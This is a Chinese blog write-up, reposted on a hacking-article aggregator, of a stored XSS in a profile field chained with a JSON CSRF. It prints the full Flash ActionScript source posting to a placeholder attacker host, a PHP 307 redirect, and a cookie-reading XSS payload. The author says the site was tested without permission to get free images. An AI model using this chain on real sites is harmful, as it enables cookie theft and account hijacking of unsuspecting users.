记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

【创宇小课堂】一次XSS和CSRF的组合拳进攻 (CSRF+JSON)

2021-09-13 19:07

Author:d4m1ts



起因


为了白嫖某个图片网中的图片,便对其进进行了简单的测试。
PS:
  • 前面信息收集什么的就不多说了,和本文内容也没多大关系,就直接讲重点吧

  • 因为自己浏览器的问题,验证码加载不出来,所以后面都是用同学的账号做的测试,高强度打码




发现存储型XSS漏洞


大概逛了一下网站,最后进入了信息设置面板

看着这么多的框,总感觉存在XSS,审查元素后发现 简介 是用<textarea>这个标签来闭合的,于是构造 payload
</textarea><script>alert(/xss/)</script><textarea>

保存刷新后,成功弹出 xss

至此存储型XSS验证成功



分界线


因为这个页面只有自己能看见,所以也就自己能触发(别人看资料的时候<>会被转义,也就没用了)

感觉这个洞很鸡肋,这个时候又想到了CSRF,如果每个人都自动将简介改成精心生成的恶意代码,那么这样每个人想再次修改自己的资料的时候,就可以触发 存储型XSS,我们也就可以盗取cookie、挂马或者其他一系列骚操作




CSRF 漏洞



按照原来一样的操作
修改信息 –> 保存时抓包 –> 生成CSRF POC –> 打开POC –> 检验是否利用成功
但是这里遇到一个问题
以前post提交的数据都是形如 a=123&b=456 这种,而这里提交的却是 json 格式的
于是这里就要利用到一些骚姿势

偷一张大佬们的图(这里因为需要验证content-type,目前搜到的就只有这种方法)

后面的大概攻击流程就是这样

生成 csrf.swf 文件

  • 从Adobe官网安装Flex SDK用于将ActionScript编译为swf文件。Flex需要安装32位JVM,可以从Oracle官网下载安装32位的JDK。(这里只能用32位的,64位的不行)

  • 创建一个名为csrf.as的文本文件,写入以下ActionScript代码。

  • 将<attacker-ip>占位符替换为攻击者服务器的ip或者域名(307跳转页面的地址)

  • 将此文件编译为csrf.swf,只需运行mxmlc csrf.as命令。这将创建一个名为csrf.swf的文件。


package
{
 import flash.display.Sprite;
 import flash.net.URLLoader;
 import flash.net.URLRequest;
 import flash.net.URLRequestHeader;
 import flash.net.URLRequestMethod;public class csrf extends Sprite
 {
   public function csrf()
   {
     super();
     var member1:Object = null;
     var myJson:String = null;
     member1 = new Object();
     member1 = {
         "gender":"2",
         "homeCity":"4170",
         "nowCity":"4170",
         "profession":"23",
         "description":"</textarea><script>alert(document.cookie)</script><textarea>",
         "signature":""
     };
     var myData:Object = member1;
     myJson = JSON.stringify(myData);
     myJson = JSON.stringify(myData);
     var url:String = "http://<attacker-ip>/307.php";
     var request:URLRequest = new URLRequest(url);
     request.requestHeaders.push(new URLRequestHeader("Content-Type","application/json"));
     request.data = myJson;
     request.method = URLRequestMethod.POST;
     var urlLoader:URLLoader = new URLLoader();try
     {
         urlLoader.load(request);
         return;
     }
     catch(e:Error)
     {
         trace(e);
         return;
     }
   }
 }
}

重定向php文件

https://xxxx.cn/xxxx/xxxxx 为你要重定向的地址,即修改用户简介的地址,目标网站,不是攻击者的服务器
307.php 文件内容
<?php
// redirect automatically
header("Location: https://xxxx.cn/xxxx/xxxxx", true, 307);
?>

利用过程

攻击者将 csrf.swf 和 307.php 文件放入同一目录
受害者在登陆存在CSRF漏洞的网站后,访问攻击者服务器上的swf文件

点击启动flash
可以在下面的网络选项中,看到307跳转成功,而且已经成功提交了POST数据

此时我们再刷新受害者个人消息页面,即可成功弹出 cookie 值
到此 CSRF+XSS 组合拳成功打出





总结



  • 有框的地方就可能存在XSS

  • 一定要细心,不仅仅在网站审查上要细心

  • CSRF + JSON 网上也有很多,不过都不是以实战来讲的

  • 网上有些 CSRF + JSON 的利用有坑(这也是为什么我之前花了一整天都没成功)


参考

  • 在JSON端点上利用CSRF漏洞的实践教程

http://www.4hou.com/web/10234.html
  • Exploiting JSON CSRF

https://www.secpulse.com/archives/61297.html
  • Exploiting JSON Cross Site Request Forgery (CSRF) using Flash

https://www.geekboy.ninja/blog/tag/json-csrf/


知识来源: https://mp.weixin.qq.com/s?__biz=MzAxMDc5NzYwNQ==&mid=2652408623&idx=1&sn=aca55fc32ab4c69a8f64e2597bfa1b77

阅读:15162 | 评论:0 | 标签:xss CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“【创宇小课堂】一次XSS和CSRF的组合拳进攻 (CSRF+JSON)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求赞助求支持💖

标签云